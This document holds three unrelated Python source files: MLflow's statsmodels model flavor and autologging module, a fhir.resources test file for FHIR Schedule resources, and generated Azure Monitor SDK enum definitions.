/mlflow/statsmodels.py
|
4720cc61e54b2416f4372b56106953e4dbd4d440
|
[
"Apache-2.0"
] |
permissive
|
mlflow/mlflow
|
ca97bfbbf32f8e59f454e428f5e46eb3d34d062f
|
37298ffafcd34002352d01d579d4524790544267
|
refs/heads/master
| 2023-09-01T13:15:53.902815
| 2023-09-01T09:00:42
| 2023-09-01T09:00:42
| 136,202,695
| 14,102
| 3,748
|
Apache-2.0
| 2023-09-14T21:52:42
| 2018-06-05T16:05:58
|
Python
|
UTF-8
|
Python
| false
| false
| 23,318
|
py
|
statsmodels.py
|
"""
The ``mlflow.statsmodels`` module provides an API for logging and loading statsmodels models.
This module exports statsmodels models with the following flavors:
statsmodels (native) format
This is the main flavor that can be loaded back into statsmodels, which relies on pickle
internally to serialize a model.
:py:mod:`mlflow.pyfunc`
Produced for use by generic pyfunc-based deployment tools and batch inference.
.. _statsmodels.base.model.Results:
https://www.statsmodels.org/stable/_modules/statsmodels/base/model.html#Results
"""
import inspect
import itertools
import logging
import os
from typing import Any, Dict, Optional
import yaml
import mlflow
from mlflow import pyfunc
from mlflow.exceptions import MlflowException
from mlflow.models import Model, ModelInputExample, ModelSignature
from mlflow.models.model import MLMODEL_FILE_NAME
from mlflow.models.signature import _infer_signature_from_input_example
from mlflow.models.utils import _save_example
from mlflow.tracking._model_registry import DEFAULT_AWAIT_MAX_SLEEP_SECONDS
from mlflow.tracking.artifact_utils import _download_artifact_from_uri
from mlflow.utils.autologging_utils import (
autologging_integration,
get_autologging_config,
log_fn_args_as_params,
safe_patch,
)
from mlflow.utils.docstring_utils import LOG_MODEL_PARAM_DOCS, format_docstring
from mlflow.utils.environment import (
_CONDA_ENV_FILE_NAME,
_CONSTRAINTS_FILE_NAME,
_PYTHON_ENV_FILE_NAME,
_REQUIREMENTS_FILE_NAME,
_mlflow_conda_env,
_process_conda_env,
_process_pip_requirements,
_PythonEnv,
_validate_env_arguments,
)
from mlflow.utils.file_utils import write_to
from mlflow.utils.model_utils import (
_add_code_from_conf_to_system_path,
_get_flavor_configuration,
_validate_and_copy_code_paths,
_validate_and_prepare_target_save_path,
)
from mlflow.utils.requirements_utils import _get_pinned_requirement
from mlflow.utils.validation import _is_numeric
FLAVOR_NAME = "statsmodels"
STATSMODELS_DATA_SUBPATH = "model.statsmodels"
_logger = logging.getLogger(__name__)
def get_default_pip_requirements():
"""
:return: A list of default pip requirements for MLflow Models produced by this flavor.
Calls to :func:`save_model()` and :func:`log_model()` produce a pip environment
that, at minimum, contains these requirements.
"""
return [_get_pinned_requirement("statsmodels")]
def get_default_conda_env():
"""
:return: The default Conda environment for MLflow Models produced by calls to
:func:`save_model()` and :func:`log_model()`.
"""
return _mlflow_conda_env(additional_pip_deps=get_default_pip_requirements())
_model_size_threshold_for_emitting_warning = 100 * 1024 * 1024 # 100 MB
_save_model_called_from_autolog = False
@format_docstring(LOG_MODEL_PARAM_DOCS.format(package_name=FLAVOR_NAME))
def save_model(
statsmodels_model,
path,
conda_env=None,
code_paths=None,
mlflow_model=None,
remove_data: bool = False,
signature: ModelSignature = None,
input_example: ModelInputExample = None,
pip_requirements=None,
extra_pip_requirements=None,
metadata=None,
):
"""
Save a statsmodels model to a path on the local file system.
:param statsmodels_model: statsmodels model (an instance of `statsmodels.base.model.Results`_)
to be saved.
:param path: Local path where the model is to be saved.
:param conda_env: {{ conda_env }}
:param code_paths: A list of local filesystem paths to Python file dependencies (or directories
containing file dependencies). These files are *prepended* to the system
path when the model is loaded.
:param mlflow_model: :py:mod:`mlflow.models.Model` this flavor is being added to.
:param remove_data: bool. If False (default), then the instance is pickled without changes.
If True, then all arrays with length nobs are set to None before
pickling. See the remove_data method.
In some cases not all arrays will be set to None.
:param signature: {{ signature }}
:param input_example: {{ input_example }}
:param pip_requirements: {{ pip_requirements }}
:param extra_pip_requirements: {{ extra_pip_requirements }}
:param metadata: Custom metadata dictionary passed to the model and stored in the MLmodel file.
.. Note:: Experimental: This parameter may change or be removed in a future
release without warning.
"""
import statsmodels
_validate_env_arguments(conda_env, pip_requirements, extra_pip_requirements)
path = os.path.abspath(path)
_validate_and_prepare_target_save_path(path)
model_data_path = os.path.join(path, STATSMODELS_DATA_SUBPATH)
code_dir_subpath = _validate_and_copy_code_paths(code_paths, path)
if signature is None and input_example is not None:
wrapped_model = _StatsmodelsModelWrapper(statsmodels_model)
signature = _infer_signature_from_input_example(input_example, wrapped_model)
elif signature is False:
signature = None
if mlflow_model is None:
mlflow_model = Model()
if signature is not None:
mlflow_model.signature = signature
if input_example is not None:
_save_example(mlflow_model, input_example, path)
if metadata is not None:
mlflow_model.metadata = metadata
# Save a statsmodels model
statsmodels_model.save(model_data_path, remove_data)
if _save_model_called_from_autolog and not remove_data:
saved_model_size = os.path.getsize(model_data_path)
if saved_model_size >= _model_size_threshold_for_emitting_warning:
_logger.warning(
"The fitted model is larger than "
f"{_model_size_threshold_for_emitting_warning // (1024 * 1024)} MB, "
f"saving it as artifacts is time consuming.\n"
"To reduce model size, use `mlflow.statsmodels.autolog(log_models=False)` and "
"manually log model by "
'`mlflow.statsmodels.log_model(model, remove_data=True, artifact_path="model")`'
)
pyfunc.add_to_model(
mlflow_model,
loader_module="mlflow.statsmodels",
data=STATSMODELS_DATA_SUBPATH,
conda_env=_CONDA_ENV_FILE_NAME,
python_env=_PYTHON_ENV_FILE_NAME,
code=code_dir_subpath,
)
mlflow_model.add_flavor(
FLAVOR_NAME,
statsmodels_version=statsmodels.__version__,
data=STATSMODELS_DATA_SUBPATH,
code=code_dir_subpath,
)
mlflow_model.save(os.path.join(path, MLMODEL_FILE_NAME))
if conda_env is None:
if pip_requirements is None:
default_reqs = get_default_pip_requirements()
# To ensure `_load_pyfunc` can successfully load the model during the dependency
# inference, `mlflow_model.save` must be called beforehand to save an MLmodel file.
inferred_reqs = mlflow.models.infer_pip_requirements(
path,
FLAVOR_NAME,
fallback=default_reqs,
)
default_reqs = sorted(set(inferred_reqs).union(default_reqs))
else:
default_reqs = None
conda_env, pip_requirements, pip_constraints = _process_pip_requirements(
default_reqs,
pip_requirements,
extra_pip_requirements,
)
else:
conda_env, pip_requirements, pip_constraints = _process_conda_env(conda_env)
with open(os.path.join(path, _CONDA_ENV_FILE_NAME), "w") as f:
yaml.safe_dump(conda_env, stream=f, default_flow_style=False)
# Save `constraints.txt` if necessary
if pip_constraints:
write_to(os.path.join(path, _CONSTRAINTS_FILE_NAME), "\n".join(pip_constraints))
# Save `requirements.txt`
write_to(os.path.join(path, _REQUIREMENTS_FILE_NAME), "\n".join(pip_requirements))
_PythonEnv.current().to_yaml(os.path.join(path, _PYTHON_ENV_FILE_NAME))
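# Illustrative sketch only (not part of the original module): a minimal call to
# `save_model` on a fitted OLS result. The toy data and output path below are made up.
def _example_save_model(output_path="/tmp/statsmodels_ols_model"):
    import numpy as np
    import statsmodels.api as sm

    X = sm.add_constant(np.arange(50, dtype=float))
    y = 3.0 * X[:, 1] + 1.0
    fitted = sm.OLS(y, X).fit()
    # Writes the pickled results plus the MLmodel file, conda.yaml and requirements.txt;
    # remove_data=True drops the training arrays so the pickle stays small.
    save_model(fitted, output_path, remove_data=True)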
@format_docstring(LOG_MODEL_PARAM_DOCS.format(package_name=FLAVOR_NAME))
def log_model(
statsmodels_model,
artifact_path,
conda_env=None,
code_paths=None,
registered_model_name=None,
remove_data: bool = False,
signature: ModelSignature = None,
input_example: ModelInputExample = None,
await_registration_for=DEFAULT_AWAIT_MAX_SLEEP_SECONDS,
pip_requirements=None,
extra_pip_requirements=None,
metadata=None,
**kwargs,
):
"""
Log a statsmodels model as an MLflow artifact for the current run.
:param statsmodels_model: statsmodels model (an instance of `statsmodels.base.model.Results`_)
to be saved.
:param artifact_path: Run-relative artifact path.
:param conda_env: {{ conda_env }}
:param code_paths: A list of local filesystem paths to Python file dependencies (or directories
containing file dependencies). These files are *prepended* to the system
path when the model is loaded.
:param registered_model_name: If given, create a model version under
``registered_model_name``, also creating a registered model if one
with the given name does not exist.
:param remove_data: bool. If False (default), then the instance is pickled without changes.
If True, then all arrays with length nobs are set to None before
pickling. See the remove_data method.
In some cases not all arrays will be set to None.
:param signature: {{ signature }}
:param input_example: {{ input_example }}
:param await_registration_for: Number of seconds to wait for the model version to finish
being created and is in ``READY`` status. By default, the function
waits for five minutes. Specify 0 or None to skip waiting.
:param pip_requirements: {{ pip_requirements }}
:param extra_pip_requirements: {{ extra_pip_requirements }}
:param metadata: Custom metadata dictionary passed to the model and stored in the MLmodel file.
.. Note:: Experimental: This parameter may change or be removed in a future
release without warning.
:return: A :py:class:`ModelInfo <mlflow.models.model.ModelInfo>` instance that contains the
metadata of the logged model.
"""
return Model.log(
artifact_path=artifact_path,
flavor=mlflow.statsmodels,
registered_model_name=registered_model_name,
statsmodels_model=statsmodels_model,
conda_env=conda_env,
code_paths=code_paths,
signature=signature,
input_example=input_example,
await_registration_for=await_registration_for,
remove_data=remove_data,
pip_requirements=pip_requirements,
extra_pip_requirements=extra_pip_requirements,
metadata=metadata,
**kwargs,
)
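# Illustrative sketch only: logging a fitted result to the active MLflow run. The toy
# OLS fit and the "model" artifact path are examples, not part of the original module.
def _example_log_model():
    import numpy as np
    import statsmodels.api as sm

    X = sm.add_constant(np.arange(30, dtype=float))
    y = 0.5 * X[:, 1] - 2.0
    fitted = sm.OLS(y, X).fit()
    with mlflow.start_run():
        return log_model(fitted, artifact_path="model", remove_data=True)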
def _load_model(path):
import statsmodels.iolib.api as smio
return smio.load_pickle(path)
def _load_pyfunc(path):
"""
Load PyFunc implementation. Called by ``pyfunc.load_model``.
:param path: Local filesystem path to the MLflow Model with the ``statsmodels`` flavor.
"""
return _StatsmodelsModelWrapper(_load_model(path))
def load_model(model_uri, dst_path=None):
"""
Load a statsmodels model from a local file or a run.
:param model_uri: The location, in URI format, of the MLflow model. For example:
- ``/Users/me/path/to/local/model``
- ``relative/path/to/local/model``
- ``s3://my_bucket/path/to/model``
- ``runs:/<mlflow_run_id>/run-relative/path/to/model``
For more information about supported URI schemes, see
`Referencing Artifacts <https://www.mlflow.org/docs/latest/tracking.html#
artifact-locations>`_.
:param dst_path: The local filesystem path to which to download the model artifact.
This directory must already exist. If unspecified, a local output
path will be created.
:return: A statsmodels model (an instance of `statsmodels.base.model.Results`_).
"""
local_model_path = _download_artifact_from_uri(artifact_uri=model_uri, output_path=dst_path)
flavor_conf = _get_flavor_configuration(model_path=local_model_path, flavor_name=FLAVOR_NAME)
_add_code_from_conf_to_system_path(local_model_path, flavor_conf)
statsmodels_model_file_path = os.path.join(
local_model_path, flavor_conf.get("data", STATSMODELS_DATA_SUBPATH)
)
return _load_model(path=statsmodels_model_file_path)
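# Illustrative sketch: a saved or logged model can be loaded back by URI, e.g.
#   results = load_model("runs:/<run_id>/model")  # "<run_id>" stands for a real run id
# which returns the original statsmodels Results object.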
class _StatsmodelsModelWrapper:
def __init__(self, statsmodels_model):
self.statsmodels_model = statsmodels_model
def predict(
self, dataframe, params: Optional[Dict[str, Any]] = None # pylint: disable=unused-argument
):
"""
:param dataframe: Model input data.
:param params: Additional parameters to pass to the model for inference.
.. Note:: Experimental: This parameter may change or be removed in a future
release without warning.
:return: Model predictions.
"""
from statsmodels.tsa.base.tsa_model import TimeSeriesModel
model = self.statsmodels_model.model
if isinstance(model, TimeSeriesModel):
# Assume the inference dataframe has columns "start" and "end", and just one row
# TODO: move this to a specific mlflow.statsmodels.tsa flavor? Time series models
# often expect slightly different arguments to make predictions
if dataframe.shape[0] != 1 or not (
"start" in dataframe.columns and "end" in dataframe.columns
):
raise MlflowException(
"prediction dataframes for a TimeSeriesModel must have exactly one row"
+ " and include columns called start and end"
)
start_date = dataframe["start"][0]
end_date = dataframe["end"][0]
return self.statsmodels_model.predict(start=start_date, end=end_date)
else:
return self.statsmodels_model.predict(dataframe)
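# Illustrative sketch only: when the wrapped model is a TimeSeriesModel, the pyfunc
# flavor expects a single-row dataframe with "start" and "end" columns. The model URI
# below is a hypothetical placeholder.
def _example_pyfunc_timeseries_predict(model_uri="runs:/<run_id>/model"):
    import pandas as pd

    loaded = pyfunc.load_model(model_uri)
    horizon = pd.DataFrame({"start": ["2023-01-01"], "end": ["2023-03-31"]})
    return loaded.predict(horizon)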
class AutologHelpers:
# Autologging should be done only in the fit function called by the user, but not
# inside other internal fit functions
should_autolog = True
# Currently we only autolog basic metrics
_autolog_metric_allowlist = [
"aic",
"bic",
"centered_tss",
"condition_number",
"df_model",
"df_resid",
"ess",
"f_pvalue",
"fvalue",
"llf",
"mse_model",
"mse_resid",
"mse_total",
"rsquared",
"rsquared_adj",
"scale",
"ssr",
"uncentered_tss",
]
def _get_autolog_metrics(fitted_model):
result_metrics = {}
failed_evaluating_metrics = set()
for metric in _autolog_metric_allowlist:
try:
if hasattr(fitted_model, metric):
metric_value = getattr(fitted_model, metric)
if _is_numeric(metric_value):
result_metrics[metric] = metric_value
except Exception:
failed_evaluating_metrics.add(metric)
if len(failed_evaluating_metrics) > 0:
_logger.warning(
f"Failed to autolog metrics: {', '.join(sorted(failed_evaluating_metrics))}."
)
return result_metrics
@autologging_integration(FLAVOR_NAME)
def autolog(
log_models=True,
log_datasets=True,
disable=False,
exclusive=False,
disable_for_unsupported_versions=False,
silent=False,
registered_model_name=None,
extra_tags=None,
): # pylint: disable=unused-argument
"""
Enables (or disables) and configures automatic logging from statsmodels to MLflow.
Logs the following:
- allowlisted metrics returned by the `fit` method of any subclass of
statsmodels.base.model.Model; the allowlisted metrics are: {autolog_metric_allowlist}
- the trained model.
- a text artifact (``model_summary.txt``) containing the model summary.
:param log_models: If ``True``, trained models are logged as MLflow model artifacts.
If ``False``, trained models are not logged.
Input examples and model signatures, which are attributes of MLflow models,
are also omitted when ``log_models`` is ``False``.
:param log_datasets: If ``True``, dataset information is logged to MLflow Tracking.
If ``False``, dataset information is not logged.
:param disable: If ``True``, disables the statsmodels autologging integration. If ``False``,
enables the statsmodels autologging integration.
:param exclusive: If ``True``, autologged content is not logged to user-created fluent runs.
If ``False``, autologged content is logged to the active fluent run,
which may be user-created.
:param disable_for_unsupported_versions: If ``True``, disable autologging for versions of
statsmodels that have not been tested against this version of the MLflow
client or are incompatible.
:param silent: If ``True``, suppress all event logs and warnings from MLflow during statsmodels
autologging. If ``False``, show all events and warnings during statsmodels
autologging.
:param registered_model_name: If given, each time a model is trained, it is registered as a
new model version of the registered model with this name.
The registered model is created if it does not already exist.
:param extra_tags: A dictionary of extra tags to set on each managed run created by autologging.
"""
import statsmodels
# Autologging depends on exploring the class tree of models within the
# `statsmodels.base.model` module. In order to load / access this module, the
# `statsmodels.api` module must be imported
import statsmodels.api
def find_subclasses(klass):
"""
Recursively return a (non-nested) list of the class object and all its subclasses
:param klass: the class whose class subtree we want to retrieve
:return: a list of classes that includes the argument in the first position
"""
subclasses = klass.__subclasses__()
if subclasses:
subclass_lists = [find_subclasses(c) for c in subclasses]
chain = itertools.chain.from_iterable(subclass_lists)
result = [klass] + list(chain)
return result
else:
return [klass]
def overrides(klass, function_name):
"""
Returns True when the class passed as the first argument overrides ``function_name``.
Based on https://stackoverflow.com/a/62303206/5726057
:param klass: the class we are inspecting
:param function_name: a string with the name of the method whose overriding we want to check
:return: True if ``function_name`` is overridden in ``klass``, False otherwise
"""
try:
superclass = inspect.getmro(klass)[1]
overridden = getattr(klass, function_name) is not getattr(superclass, function_name)
return overridden
except (IndexError, AttributeError):
return False
def patch_class_tree(klass):
"""
Patches all subclasses that override any auto-loggable method via monkey patching using
the gorilla package, taking the argument as the tree root in the class hierarchy. Every
auto-loggable method found in any of the subclasses is replaced by the patched version.
:param klass: root in the class hierarchy to be analyzed and patched recursively
"""
# TODO: add more autologgable methods here (e.g. fit_regularized, from_formula, etc)
# See https://www.statsmodels.org/dev/api.html
autolog_supported_func = {"fit": wrapper_fit}
glob_subclasses = set(find_subclasses(klass))
# Create a patch for every method that needs to be patched, i.e. those
# which actually override an autologgable method
patches_list = [
# Link the patched function with the original via a local variable in the closure
# to allow invoking superclass methods in the context of the subclass, and not
# losing the trace of the true original method
(clazz, method_name, wrapper_func)
for clazz in glob_subclasses
for (method_name, wrapper_func) in autolog_supported_func.items()
if overrides(clazz, method_name)
]
for clazz, method_name, patch_impl in patches_list:
safe_patch(
FLAVOR_NAME, clazz, method_name, patch_impl, manage_run=True, extra_tags=extra_tags
)
def wrapper_fit(original, self, *args, **kwargs):
should_autolog = False
if AutologHelpers.should_autolog:
AutologHelpers.should_autolog = False
should_autolog = True
try:
if should_autolog:
# This may generate warnings due to collisions in already-logged param names
log_fn_args_as_params(original, args, kwargs)
# training model
model = original(self, *args, **kwargs)
if should_autolog:
# Log the model
if get_autologging_config(FLAVOR_NAME, "log_models", True):
global _save_model_called_from_autolog
_save_model_called_from_autolog = True
registered_model_name = get_autologging_config(
FLAVOR_NAME, "registered_model_name", None
)
try:
log_model(
model,
artifact_path="model",
registered_model_name=registered_model_name,
)
finally:
_save_model_called_from_autolog = False
# Log the most common metrics
if isinstance(model, statsmodels.base.wrapper.ResultsWrapper):
metrics_dict = _get_autolog_metrics(model)
mlflow.log_metrics(metrics_dict)
model_summary = model.summary().as_text()
mlflow.log_text(model_summary, "model_summary.txt")
return model
finally:
# Clean the shared flag for future calls in case it had been set here ...
if should_autolog:
AutologHelpers.should_autolog = True
patch_class_tree(statsmodels.base.model.Model)
if autolog.__doc__ is not None:
autolog.__doc__ = autolog.__doc__.format(
autolog_metric_allowlist=", ".join(_autolog_metric_allowlist)
)
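# Illustrative usage sketch (not part of the module above); assumes statsmodels and an
# MLflow tracking setup are available. The toy data and values are made up.
def _example_autolog():
    import numpy as np
    import statsmodels.api as sm

    mlflow.statsmodels.autolog()
    X = sm.add_constant(np.arange(100, dtype=float))
    y = 2.0 * X[:, 1] + 1.0 + np.random.normal(size=100)
    with mlflow.start_run():
        # Params, allowlisted metrics, the model summary text and (by default) the
        # fitted model itself are logged automatically by the patched `fit`.
        return sm.OLS(y, X).fit()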
path: /fhir/resources/tests/test_schedule.py | repo: nazrulworld/fhir.resources | license: BSD-3-Clause (permissive) | language: Python | encoding: UTF-8 | size: 9,772 bytes
# -*- coding: utf-8 -*-
"""
Profile: http://hl7.org/fhir/StructureDefinition/Schedule
Release: R5
Version: 5.0.0
Build ID: 2aecd53
Last updated: 2023-03-26T15:21:02.749+11:00
"""
from pydantic.validators import bytes_validator # noqa: F401
from .. import fhirtypes # noqa: F401
from .. import schedule
def impl_schedule_1(inst):
assert inst.active is True
assert inst.actor[0].display == "Dr. Beverly Crusher"
assert inst.actor[0].reference == "Practitioner/1"
assert inst.actor[1].display == "USS Enterprise-D Sickbay"
assert inst.actor[1].reference == "Location/3"
assert inst.comment == (
"The slots attached to this schedule are for genetic "
"counselling in the USS Enterprise-D Sickbay."
)
assert inst.id == "exampleloc1"
assert inst.identifier[0].system == "http://example.org/scheduleid"
assert inst.identifier[0].use == "usual"
assert inst.identifier[0].value == "46"
assert inst.meta.tag[0].code == "HTEST"
assert inst.meta.tag[0].display == "test health data"
assert (
inst.meta.tag[0].system == "http://terminology.hl7.org/CodeSystem/v3-ActReason"
)
assert inst.planningHorizon.end == fhirtypes.DateTime.validate(
"2017-12-25T09:30:00Z"
)
assert inst.planningHorizon.start == fhirtypes.DateTime.validate(
"2017-12-25T09:15:00Z"
)
assert inst.serviceCategory[0].coding[0].code == "17"
assert inst.serviceCategory[0].coding[0].display == "General Practice"
assert (
inst.serviceCategory[0].coding[0].system
== "http://terminology.hl7.org/CodeSystem/service-category"
)
assert inst.serviceType[0].concept.coding[0].code == "75"
assert inst.serviceType[0].concept.coding[0].display == "Genetic Counselling"
assert (
inst.serviceType[0].concept.coding[0].system
== "http://terminology.hl7.org/CodeSystem/service-type"
)
assert inst.specialty[0].coding[0].code == "394580004"
assert inst.specialty[0].coding[0].display == "Clinical genetics"
assert inst.specialty[0].coding[0].system == "http://snomed.info/sct"
assert inst.text.status == "generated"
def test_schedule_1(base_settings):
"""No. 1 tests collection for Schedule.
Test File: schedule-provider-location1-example.json
"""
filename = (
base_settings["unittest_data_dir"] / "schedule-provider-location1-example.json"
)
inst = schedule.Schedule.parse_file(
filename, content_type="application/json", encoding="utf-8"
)
assert "Schedule" == inst.resource_type
impl_schedule_1(inst)
# test the reverse: generate data from the instance and create it again.
data = inst.dict()
assert "Schedule" == data["resourceType"]
inst2 = schedule.Schedule(**data)
impl_schedule_1(inst2)
def impl_schedule_2(inst):
assert inst.active is True
assert inst.actor[0].display == "Burgers UMC, South Wing, second floor"
assert inst.actor[0].reference == "Location/1"
assert inst.comment == (
"The slots attached to this schedule should be specialized to"
" cover immunizations within the clinic"
)
assert inst.id == "example"
assert inst.identifier[0].system == "http://example.org/scheduleid"
assert inst.identifier[0].use == "usual"
assert inst.identifier[0].value == "45"
assert inst.meta.tag[0].code == "HTEST"
assert inst.meta.tag[0].display == "test health data"
assert (
inst.meta.tag[0].system == "http://terminology.hl7.org/CodeSystem/v3-ActReason"
)
assert inst.name == "Burgers UMC, South Wing - Immunizations"
assert inst.planningHorizon.end == fhirtypes.DateTime.validate(
"2013-12-25T09:30:00Z"
)
assert inst.planningHorizon.start == fhirtypes.DateTime.validate(
"2013-12-25T09:15:00Z"
)
assert inst.serviceCategory[0].coding[0].code == "17"
assert inst.serviceCategory[0].coding[0].display == "General Practice"
assert (
inst.serviceCategory[0].coding[0].system
== "http://terminology.hl7.org/CodeSystem/service-category"
)
assert inst.serviceType[0].concept.coding[0].code == "57"
assert inst.serviceType[0].concept.coding[0].display == "Immunization"
assert (
inst.serviceType[0].concept.coding[0].system
== "http://terminology.hl7.org/CodeSystem/service-type"
)
assert inst.specialty[0].coding[0].code == "408480009"
assert inst.specialty[0].coding[0].display == "Clinical immunology"
assert inst.specialty[0].coding[0].system == "http://snomed.info/sct"
assert inst.text.status == "generated"
def test_schedule_2(base_settings):
"""No. 2 tests collection for Schedule.
Test File: schedule-example.json
"""
filename = base_settings["unittest_data_dir"] / "schedule-example.json"
inst = schedule.Schedule.parse_file(
filename, content_type="application/json", encoding="utf-8"
)
assert "Schedule" == inst.resource_type
impl_schedule_2(inst)
# test the reverse: generate data from the instance and create it again.
data = inst.dict()
assert "Schedule" == data["resourceType"]
inst2 = schedule.Schedule(**data)
impl_schedule_2(inst2)
def impl_schedule_3(inst):
assert inst.active is True
assert inst.actor[0].display == "Burgers UMC, South Wing, second floor"
assert inst.actor[0].reference == "Location/1"
assert inst.id == "example-hcs"
assert inst.meta.tag[0].code == "HTEST"
assert inst.meta.tag[0].display == "test health data"
assert (
inst.meta.tag[0].system == "http://terminology.hl7.org/CodeSystem/v3-ActReason"
)
assert inst.name == "Burgers UMC, Posttraumatic Stress Disorder counselling"
assert inst.planningHorizon.end == fhirtypes.DateTime.validate(
"2023-12-25T09:30:00Z"
)
assert inst.planningHorizon.start == fhirtypes.DateTime.validate(
"2023-12-25T09:15:00Z"
)
assert inst.serviceCategory[0].coding[0].code == "8"
assert inst.serviceCategory[0].coding[0].display == "Counselling"
assert (
inst.serviceCategory[0].coding[0].system
== "http://terminology.hl7.org/CodeSystem/service-category"
)
assert (
inst.serviceType[0].reference.display
== "Burgers UMC, Posttraumatic Stress Disorder Clinic"
)
assert inst.serviceType[0].reference.reference == "HealthcareService/example"
assert inst.specialty[0].coding[0].code == "47505003"
assert inst.specialty[0].coding[0].display == "Posttraumatic stress disorder"
assert inst.specialty[0].coding[0].system == "http://snomed.info/sct"
assert inst.text.status == "generated"
def test_schedule_3(base_settings):
"""No. 3 tests collection for Schedule.
Test File: schedule-example-hcs.json
"""
filename = base_settings["unittest_data_dir"] / "schedule-example-hcs.json"
inst = schedule.Schedule.parse_file(
filename, content_type="application/json", encoding="utf-8"
)
assert "Schedule" == inst.resource_type
impl_schedule_3(inst)
# test the reverse: generate data from the instance and create it again.
data = inst.dict()
assert "Schedule" == data["resourceType"]
inst2 = schedule.Schedule(**data)
impl_schedule_3(inst2)
def impl_schedule_4(inst):
assert inst.active is True
assert inst.actor[0].display == "Dr. Beverly Crusher"
assert inst.actor[0].reference == "Practitioner/1"
assert inst.actor[1].display == "Starfleet HQ Sickbay"
assert inst.actor[1].reference == "Location/2"
assert inst.comment == (
"The slots attached to this schedule are for neurosurgery "
"operations at Starfleet HQ only."
)
assert inst.id == "exampleloc2"
assert inst.identifier[0].system == "http://example.org/scheduleid"
assert inst.identifier[0].use == "usual"
assert inst.identifier[0].value == "47"
assert inst.meta.tag[0].code == "HTEST"
assert inst.meta.tag[0].display == "test health data"
assert (
inst.meta.tag[0].system == "http://terminology.hl7.org/CodeSystem/v3-ActReason"
)
assert inst.planningHorizon.end == fhirtypes.DateTime.validate(
"2017-12-25T09:30:00Z"
)
assert inst.planningHorizon.start == fhirtypes.DateTime.validate(
"2017-12-25T09:15:00Z"
)
assert inst.serviceCategory[0].coding[0].code == "31"
assert inst.serviceCategory[0].coding[0].display == "Specialist Surgical"
assert (
inst.serviceCategory[0].coding[0].system
== "http://terminology.hl7.org/CodeSystem/service-category"
)
assert inst.serviceType[0].concept.coding[0].code == "221"
assert inst.serviceType[0].concept.coding[0].display == "Surgery - General"
assert (
inst.serviceType[0].concept.coding[0].system
== "http://terminology.hl7.org/CodeSystem/service-type"
)
assert inst.specialty[0].coding[0].code == "394610002"
assert inst.specialty[0].coding[0].display == "Surgery-Neurosurgery"
assert inst.specialty[0].coding[0].system == "http://snomed.info/sct"
assert inst.text.status == "generated"
def test_schedule_4(base_settings):
"""No. 4 tests collection for Schedule.
Test File: schedule-provider-location2-example.json
"""
filename = (
base_settings["unittest_data_dir"] / "schedule-provider-location2-example.json"
)
inst = schedule.Schedule.parse_file(
filename, content_type="application/json", encoding="utf-8"
)
assert "Schedule" == inst.resource_type
impl_schedule_4(inst)
# test the reverse: generate data from the instance and create it again.
data = inst.dict()
assert "Schedule" == data["resourceType"]
inst2 = schedule.Schedule(**data)
impl_schedule_4(inst2)
path: /src/monitor-control-service/azext_amcs/vendored_sdks/amcs/models/_monitor_client_enums.py | repo: Azure/azure-cli-extensions | licenses: LicenseRef-scancode-generic-cla, MIT (permissive) | language: Python | encoding: UTF-8 | size: 5,898 bytes
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from enum import Enum, EnumMeta
from six import with_metaclass
class _CaseInsensitiveEnumMeta(EnumMeta):
def __getitem__(self, name):
return super().__getitem__(name.upper())
def __getattr__(cls, name):
"""Return the enum member matching `name`
We use __getattr__ instead of descriptors or inserting into the enum
class' __dict__ in order to support `name` and `value` being both
properties for enum members (which live in the class' __dict__) and
enum members themselves.
"""
try:
return cls._member_map_[name.upper()]
except KeyError:
raise AttributeError(name)
class CreatedByType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The type of identity that created the resource.
"""
USER = "User"
APPLICATION = "Application"
MANAGED_IDENTITY = "ManagedIdentity"
KEY = "Key"
class KnownColumnDefinitionType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The type of the column data.
"""
STRING = "string"
INT = "int"
LONG = "long"
REAL = "real"
BOOLEAN = "boolean"
DATETIME = "datetime"
DYNAMIC = "dynamic"
class KnownDataCollectionEndpointProvisioningState(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The resource provisioning state. This property is READ-ONLY.
"""
CREATING = "Creating"
UPDATING = "Updating"
DELETING = "Deleting"
SUCCEEDED = "Succeeded"
FAILED = "Failed"
class KnownDataCollectionEndpointResourceKind(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The kind of the resource.
"""
LINUX = "Linux"
WINDOWS = "Windows"
class KnownDataCollectionRuleAssociationProvisioningState(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The resource provisioning state.
"""
CREATING = "Creating"
UPDATING = "Updating"
DELETING = "Deleting"
SUCCEEDED = "Succeeded"
FAILED = "Failed"
class KnownDataCollectionRuleProvisioningState(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The resource provisioning state.
"""
CREATING = "Creating"
UPDATING = "Updating"
DELETING = "Deleting"
SUCCEEDED = "Succeeded"
FAILED = "Failed"
class KnownDataCollectionRuleResourceKind(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The kind of the resource.
"""
LINUX = "Linux"
WINDOWS = "Windows"
class KnownDataFlowStreams(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
MICROSOFT_EVENT = "Microsoft-Event"
MICROSOFT_INSIGHTS_METRICS = "Microsoft-InsightsMetrics"
MICROSOFT_PERF = "Microsoft-Perf"
MICROSOFT_SYSLOG = "Microsoft-Syslog"
MICROSOFT_WINDOWS_EVENT = "Microsoft-WindowsEvent"
class KnownExtensionDataSourceStreams(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
MICROSOFT_EVENT = "Microsoft-Event"
MICROSOFT_INSIGHTS_METRICS = "Microsoft-InsightsMetrics"
MICROSOFT_PERF = "Microsoft-Perf"
MICROSOFT_SYSLOG = "Microsoft-Syslog"
MICROSOFT_WINDOWS_EVENT = "Microsoft-WindowsEvent"
class KnownLogFilesDataSourceFormat(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The data format of the log files
"""
TEXT = "text"
class KnownLogFileTextSettingsRecordStartTimestampFormat(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""One of the supported timestamp formats
"""
ISO8601 = "ISO 8601"
YYYY_MM_DD_HH_MM_SS = "YYYY-MM-DD HH:MM:SS"
